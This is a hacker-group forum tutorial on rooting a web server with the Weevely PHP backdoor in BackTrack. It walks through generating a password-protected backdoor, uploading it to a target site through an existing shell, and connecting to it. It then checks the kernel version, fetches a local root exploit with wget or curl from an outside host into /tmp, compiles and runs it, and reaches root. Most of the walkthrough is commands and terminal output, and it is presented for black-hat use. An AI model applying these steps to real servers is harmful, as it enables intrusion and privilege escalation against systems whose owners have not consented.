R00ting a server With Weevely [BackDoor in BackTrack]

Helo Friends This is Maher Bro

R00ting a server With Weevely [BackDoor in BackTrack]

Hello again guyz,

today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all open Weevely:
Menu > BacTrack > Maintaining Access > Web Backdoors > Weevely
Or
Open Terminal and type:
root@root: cd /pentest/backdoor/web/weevely

############################################################

Now lets make our backdoor by typing:
root@root:./main.py -g -o /root/Desktop/backdoor.php -p password
 by typing this command, we made a backdoor called 'backdoor.php' with the password: 'password'

++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++
-g  = Generate backdoor
-o  = Output
-p  = Password
-u  = URL
-t  = start Terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Steps:


Uploading our backdoor & connecting to it.
Checking the Kernel & Finding LocalR00t for it.
Compiling The LocalR00t
Executing..
###########################################################################
Lets start:


Open your shell and upload the backdoor:

The link to the backdoor will be the same as shell: For Example:
www.target.com/uploads/shell.php           <== shell
www.target.com/uploads/backdoor.php   <== backdoor

Connect to the backdoor by typing:
 ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password

root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/


+ Using method 'system()'.
+ Retrieving terminal basic environment variables .


[hacker@target.com/]
Now to find the kernel version type:
uname -a
[hacker@target.com/] uname -a
2.6.18 (example)


 Now we have to find the localroot for that kernel in :
www.1337day.com
www.exploit-db.com
www.google.com
and some others..


Now, we go to the directory /tmp/, coz its always writeable,
now lets say the kernel was 2.6.18
there are some ways to get the localroot:
uploading through shell
wget method
curl
Now let me explain how each method works:


ofcourse you know how to upload though the shell :P


wget
wget www.exploit.com/2.6.18.c
curl
curl www.exploit.com/2.6.18.c -o new_name


for this TUT we will use WGET




############################################




[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget www.exploit.com/2.6.18.c
--2012-01-29 05:43:37--  http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'


     0K .........                                               208M=0s


2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
 [hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
#############################################
ok, now the exploit is on the server, we have to compile it by this command:
gcc 2.6.18.c -o Maher
[hacker@target.com/tmp/]gcc 2.6.18.c -o Maher




[hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
 Maher


++++++++++++++++
chmod 777 Maher
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 Maher


++++++++++++++++
executing..
++++++++++++++++


[hacker@target.com/tmp/]./Maher
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)


R00ted!

Now You Know How to Root :D CongratzZz

GretzZz To All : VOBHH

We Are Voice Of Black Hat Hackers
And This is The
Voice OF Black hat Hackers

Allah Hafiz Remamber me in Your Prayers

Pakistan Zindabad
VOBHH Zindabad :D